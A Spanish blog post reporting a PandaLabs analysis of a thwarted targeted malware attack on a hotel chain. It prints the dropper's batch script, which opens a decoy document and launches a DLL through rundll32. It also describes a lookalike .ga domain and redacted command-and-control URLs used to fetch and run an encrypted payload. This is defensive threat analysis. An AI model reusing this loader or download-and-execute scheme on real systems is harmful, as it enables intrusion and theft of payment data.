Relato de un ataque frustrado
DETECTA:
Ataques Avanzados
contra cadenas hoteleras:
un caso
práctico
Los Ataques Avanzados Dirigidos, son cada vez más
frecuentes en el mundo empresarial, en especial en negocios en donde se
recopilan datos bancarios y personales de miles de personas, como es el caso de
las cadenas hoteleras. Justamente, en Panda Security, hace pocos días
detectamos y neutralizamos un intento de ataque contra uno de nuestros clientes
de este sector; Luis Corrons, director de nuestro laboratorio antimalware PandaLabs, a través del análisis de
este caso, nos relata cómo los ciberdelincuentes en este tipo de ataques tratan
de entrar a la red de la Empresa.
En
el caso del Ataque Avanzado Dirigido
que analizaremos, el objetivo era una lujosa cadena hotelera, cuyo nombre nos
reservaremos y que además es un cliente activo de nuestro producto de seguridad
Adaptive Defense 360, que combina
Detección y Respuesta (EDR) y Protección de Endpoints (EPP).
Explica Luis Corrons, que en la mayoría de los casos
este tipo de ataques suelen iniciarse a través de un email, que bien contiene
algún fichero adjunto que al abrirse compromete el equipo de la víctima o lo
lleva a algún enlace de una página que hará uso de una vulnerabilidad para
lograr dicho objetivo. En este caso se trataba de un mensaje de correo dirigido
a un empleado del hotel. Simulaba ser la información de pago de una estancia
que tendría lugar a finales de mayo de 2016.
El mensaje contenía un fichero adjunto comprimido, que
al abrirlo contenía un fichero con icono de Microsoft Word que mostraba lo
siguiente al ser ejecutado:
Se trata de un documento del hotel rellenado por un
cliente donde facilita los datos de pago para una estancia que tendrá lugar a
finales de mayo de 2016. Aparentemente nada raro, de hecho el documento es
idéntico a los que la empleada del hotel manda a sus clientes, viene incluso su
nombre en el mismo. Pero si nos fijamos, veremos que el fichero que viene
dentro del zip, a pesar de que tiene el icono de Word, se trata de un
ejecutable.
Cuando lo ejecutamos, crea 3 ficheros en disco y
ejecuta el primero de ellos:
– reader_sl.cmd
– ROCA.ING.docx
– adobeUpd.dll (MD5:
A213E36D3869E626D4654BCE67F6760C)
El contenido del primer fichero es el siguiente:
@echo off
start “” ROCA.ING.docx
Set xOS=x64
If
“%PROCESSOR_ARCHITECTURE%”==”x86” If Not Defined PROCESSOR_ARCHITEW6432 Set
xOS=x86
IF “%xOS%” == “x64” (start
“” C:\Windows\SysWOW64\rundll32.exe adobeUpd.dll,Wenk)
IF “%xOS%” == “x86” (start
“” C:\Windows\System32\rundll32.exe adobeUpd.dll,Wenk)
ping -n 12 localhost
Como podemos ver, al ejecutarse el malware lo
primero que hace es abrir el documento de Word para consumar el engaño a
nuestra víctima. A continuación ejecuta el fichero adobeUpd.dll, dándole como
parámetro “Wenk”, modifica sus atributos marcando el fichero como de sólo
lectura y oculto, y crea una entrada en el registro de Windows para ejecutarse
cada vez que se enciende el equipo.
Contacta con una URL específica:
http://www.************.ga/en/scripts/en.php?stream=lcc&user=iPmbzfAIRMFw
Descargándose un fichero que contiene el user del
parámetro dado a la URL (iPmbzfAIRMFw). En caso de coincidir, trata de
descargarse el fichero
http://www.************.ga/en/scripts/iPmbzfAIRMFw.jpg
Cuando tratamos de descargarlo no estaba disponible,
tampoco estaba en nuestro cliente ya que bloqueamos el intento de infección y
no se llegó a ejecutar el malware. El dominio de la URL es exactamente el mismo
dominio de nuestro cliente, salvo que ellos utilizan “.com” y los atacantes
habían registrado un dominio con el mismo nombre pero en Gabón (“.ga”). Esto lo
hicieron para pasar desapercibidos, ya que si el equipo de seguridad del hotel
ve una conexión que contiene el nombre de su dominio en teoría no debería
llamar la atención.
A pesar de que el fichero iPmbzfAIRMFw.jpg no estaba
disponible, analizando el código de adobeUpd.dll vemos que busca una marca
específica en dicho fichero, descifra los datos y lo ejecuta como un PE (que
crea como “TEMP\systm”).
Posteriormente el adobeUpd.dll se queda en un bucle conectando
aleatoriamente cada varios minutos a:
http://www.************.ga/en/scripts/en.php?mode=OPR&uid=iPmbzfAIRMFw&type=YFm
De esta manera pudimos confirmar que se trata de un ataque dirigido a esta cadena hotelera. Los
delincuentes borraron todas las huellas del servidor donde se conectaba el
malware, y como abortamos su ataque sólo podemos especular qué es lo que iban a
hacer a continuación. En nuestra experiencia, este tipo de ataques busca
comprometer un equipo de la empresa de la víctima para a continuación moverse
lateralmente hasta llegar a su objetivo final: los terminales de punto de venta
que procesan los pagos de tarjetas de crédito, tal y como hemos visto en tantos
otros casos.
Los antivirus
tradicionales no sirven contra este tipo de ataques, ya que son amenazas
creadas específicamente para la víctima y los ciberdelincuentes antes
de lanzarlo se aseguran siempre de que el malware no es detectado por firmas,
tecnologías proactivas, etc. que llevan integradas las soluciones antimalware
actuales. Es por ello que contar con servicios tipo EDR (Endpoint Detection & Response) que cuenten con tecnologías
de protección avanzada, es vital pues en estos momentos es la única protección
efectiva ante estos ataques.
No hay comentarios:
Publicar un comentario